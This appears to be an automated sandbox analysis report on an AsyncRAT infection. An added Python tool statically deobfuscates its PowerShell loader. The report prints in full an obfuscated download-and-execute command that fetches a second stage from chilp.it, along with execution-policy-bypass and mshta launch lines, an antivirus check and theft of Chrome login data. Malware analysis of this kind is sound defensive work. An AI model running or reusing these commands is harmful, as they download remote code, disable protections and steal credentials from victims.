'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
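The command line above never spells out its payload: the download cradle is split into fragments ('(New-', 'Object' hidden behind a Replace() call, '.Downlo' + 'adString(' and a one-character-per-literal URL), assembled with an array -Join, prefixed with a backtick-escaped I`E`X and piped into IEX again, with Sleep(1000) calls padding every step. None of that needs to be executed to be read back. The Python below is an added example, not part of this report or of the sample, of a static evaluator for exactly this assignment-and-join pattern: it splits the command on ';' outside quoted literals, replays each $var assignment over the tiny PowerShell subset the loader uses (single-quoted literals with '' escapes, + concatenation, .Replace(), comma arrays and -Join), resolves the backtick escape outside literals, and reports what ends up piped into IEX. SAMPLE_CMD is a constructed copy of the string-assembly tail of the command line above; the CSharpCodeProvider setup that precedes it in the real command line contributes nothing to the payload and is simply skipped because the evaluator refuses any syntax outside that subset.

```python
import re

# Constructed copy of the string-assembly tail of the wscript.exe -> powershell.exe
# command line in this report. The New-Object CSharpCodeProvider setup that precedes
# it in the real command line adds nothing to the payload; the evaluator skips it.
SAMPLE_CMD = (
    "$c1='(New-';[System.Threading.Thread]::Sleep(1000);"
    "$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');"
    "[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';$X3 = '.We';$c4='.Downlo';"
    "$D1 = 'bClient)';$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'"
    "+'/7'+'8'+'54'+'6'+'1'+'0'')';$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;"
    "$hcnx = 'I`E`X';$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X"
)
# Token groups: 1 single-quoted literal ('' escapes a quote), 2 $variable,
# 3 the only operators this loader uses; whitespace is dropped.
TOKEN_RE = re.compile(r"'((?:[^']|'')*)'|\$(\w+)|(\.Replace\(|-Join|[(),+])|\s+")
LIT_OR_CHAR = re.compile(r"'(?:[^']|'')*'|.", re.S)  # a whole literal, or one char
ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*(.*)$", re.S)
URL_RE = re.compile(r"https?://[^\s'\")]+")


def split_outside_quotes(text, sep):  # literals stay whole, so a sep inside one is ignored
    parts = [""]
    for piece in LIT_OR_CHAR.findall(text):
        if piece == sep:
            parts.append("")
        else:
            parts[-1] += piece
    return [p.strip() for p in parts if p.strip()]


def strip_backticks(text):  # drop PowerShell's escape char outside literals: I`E`X is IEX
    return "".join(p for p in LIT_OR_CHAR.findall(text) if p != "`")


def tokenize(expr):
    tokens, pos = [], 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError("unsupported syntax: %r" % expr[pos:pos + 20])
        pos, (lit, var, op) = m.end(), m.groups()
        if lit is not None: tokens.append(("str", lit.replace("''", "'")))
        elif var or op: tokens.append(("var", var) if var else ("op", op))
    return tokens


def as_str(value):  # PowerShell stringifies an array by joining it with spaces
    return " ".join(value) if isinstance(value, list) else value


# Recursive descent over literal, $var, a+b, a,b, x.Replace(a,b) and (array -Join sep).
# Anything else raises, so the untrusted command line is never executed.
class Evaluator:
    def __init__(self, expr, env):
        self.toks, self.env, self.i = tokenize(expr) + [(None, None)], env, 0
    def take(self, expected=None):
        tok = self.toks[self.i]
        if tok[0] is None or (expected and tok != expected):
            raise ValueError("expected %r, got %r" % (expected, tok))
        self.i += 1; return tok[1]
    def array(self):  # concat (',' concat)*
        items = [self.concat()]
        while self.toks[self.i] == ("op", ","):
            self.take(); items.append(self.concat())
        return items[0] if len(items) == 1 else items
    def concat(self):  # term ('+' term)*
        value = self.term()
        while self.toks[self.i] == ("op", "+"):
            self.take(); value = as_str(value) + as_str(self.term())
        return value
    def term(self):  # atom ('.Replace(' concat ',' concat ')')*
        value = self.atom()
        while self.toks[self.i] == ("op", ".Replace("):
            self.take(); old = as_str(self.concat()); self.take(("op", ","))
            new = as_str(self.concat()); self.take(("op", ")"))
            value = as_str(value).replace(old, new)
        return value
    def atom(self):  # literal | $var | '(' array ['-Join' sep] ')'
        kind, val = self.toks[self.i]
        if kind in ("str", "var"):
            self.take()
            return val if kind == "str" else self.env[val]  # KeyError: unassigned $var
        self.take(("op", "("))
        inner = self.array()
        if self.toks[self.i] == ("op", "-Join"):
            self.take(); sep = as_str(self.concat())
            inner = sep.join(inner if isinstance(inner, list) else [inner])
        self.take(("op", ")"))
        return inner


def deobfuscate(cmd):
    """Replay the assignments statically; return (variables, strings piped into IEX)."""
    env, executed = {}, []
    for stmt in split_outside_quotes(cmd, ";"):
        m = ASSIGN_RE.match(stmt)
        pipeline = split_outside_quotes(m.group(2), "|") if m else []
        try:
            value = Evaluator(pipeline[0], env).array()
        except (IndexError, KeyError, ValueError):
            continue  # Sleep() padding, New-Object lines and anything else unsupported
        env[m.group(1)] = value
        for sink in pipeline[1:]:
            if strip_backticks(sink).strip().lower() in ("iex", "invoke-expression"):
                executed.append(strip_backticks(as_str(value)))
    return env, executed
```

Run against SAMPLE_CMD, deobfuscate() returns a single IEX input, IEX(New-Object Net.WebClient).DownloadString('https://chilp.it/7854610'), and URL_RE pulls the download URL out of it; that is the second stage the report's "Powershell download and execute" Yara rule and the csc.exe activity both follow from. The evaluator deliberately fails closed: an operator it does not model raises rather than being guessed at, which is the property you want when the input is attacker-controlled.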
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\ServiceState\WindowsStateRepositoryCore.vbs'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Music\vb.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass & 'C:\Users\Public\Service.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF057.tmp' 'c:\Users\user\AppData\Local\Temp\vfl4qio1\CSC646E655CB52D4766BD87DD83F0456ED1.TMP'
Source: RegAsm.exe, 0000001B.00000003.517646079.0000000005626000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
AV process strings found (often used to terminate AV products)
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp Binary or memory string: (C:\Program Files\AVG\Antivirus\AVGUI.exe

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data